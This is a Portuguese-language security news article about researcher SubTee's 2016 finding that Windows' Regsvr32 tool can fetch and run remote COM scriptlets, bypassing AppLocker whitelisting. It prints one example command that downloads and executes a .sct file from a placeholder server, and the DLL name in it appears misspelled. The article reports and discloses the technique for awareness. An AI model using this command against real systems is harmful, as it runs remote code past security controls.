Microsoft Windows Applocker Burlado por Ferramenta Nativa de Exploração Utilizando Execução de Código Remota.

Sharing is caring ... Help us!

A ferramenta de linha de comando nativa do Windows Regsvr32 pode ser explorada ao burlar o MS Applocker e executar código remoto passando por cima dos mecanismos de proteção.

Um pesquisador de segurança recentemente descobriu uma vulnerabilidade que pode muito bem gerar o caos no mundo Windows. A falha pode ser usada para passar por cima das proteções de filtro como o Microsoft Applocker. O binário digitalmente assinado da Microsoft é uma ferramenta chamada Regsvr32 e é uma ferramenta nativa de linha de comando usada para registrar DLLs (dynamic library link) e tipicamente são geradas quando aplicações ou software são instalados em um sistemas Windows.

Uma vez que as DLLs tenham sido registradas, os dados e o código que está contido nas DLLs pode ser compartilhado por uma, duas ou muitas aplicações ao mesmo tempo; entretanto, uma prova de conceito conduzida por um pesquisador de segurança provou que a chamada para a DLL combinada com Scripplets COM (também chamados de arquivos .SCT, mais detalhes em Inside COM+) não é limitado a acesso local.

De fato, para o pesquisador foi permitido executar código JavaScript ou VBScript que está localizado em qualquer lugar da internet. Enquanto a exploração dessa vulnerabilidade apenas requer privilégios mínimos, ela torna o trabalho do atacante fácil e cômodo. Uma vez dentro da rede, o atacante é capaz de executar código malicioso pertencente à qualquer lugar da internet.

Além do mais, a ferramenta de linha de comando Regsvr32 é uma proxy e possui SSL, logo, é uma ferramenta perfeita e fácil de abusar. O pesquisador de segurança, SubTee, explica: “Eu estive pesquisando mecanismos persistentes, que me conduziu a um lugar sombrio. Eu não desejaria a nenhum mortal COM+. Eu encontrei uma referência que declara o código COM+ no elemento de registro no registro e na saída. Eu loguei como um usuário normal e apenas cliquei no arquivo .sct e escolhi “sair” e funcionou.

Esse é um exemplo da chamada de execução:

regsvr32 /s/n/u/i:http://server/file.sct scrobi.dll

Ainda é incerto se essa “funcionalidade” na ferramenta de linha de comando Regsvr32 é padrão ou falha de desenvolvimento, pois não há muita informação sendo documentada sobre essa ferramenta na página do Microsoft MSDN. Entretanto, o seu uso como veículo de exploit é evidente. Da perspectiva de resposta a incidentes e forense digital, a menos que o analista saiba exatamente o que procurar, a detecção desse vetor de ataque é muito difícil de identificar pois não há virtualmente artefato ou restos para serem encontrados uma vez que o comando é executado. Até a data, a Microsoft ainda não comentou ou confirmou essa vulnerabilidade e é incerto quando a Microsoft irá fornecer uma correção, se o fizer. O pesquisador reportou a falha a Microsoft na Terça, no dia 19 de Abril de 2016. Uma prova de conceito está disponível no GITHUB, reporta o site securityaffairs.co.

fonte:

http://securityaffairs.co/wordpress/46600/breaking-news/applocker-circumvented.html

http://i1.wp.com/securityaffairs.co/wordpress/wp-content/uploads/2016/04/bypassing-

Microsoft-AppLocker.png?resize=1024%2C536

http://thrysoee.dk/InsideCOM+/ch05e.htm

http://subt0x10.blogspot.com.br/2016/04/bypass-application-whitelisting-script.html

https://msdn.microsoft.com/en-us/library/ms859484.aspx

https://gist.github.com/subTee/24c7d8e1ff0f5602092f58cbb3f7d302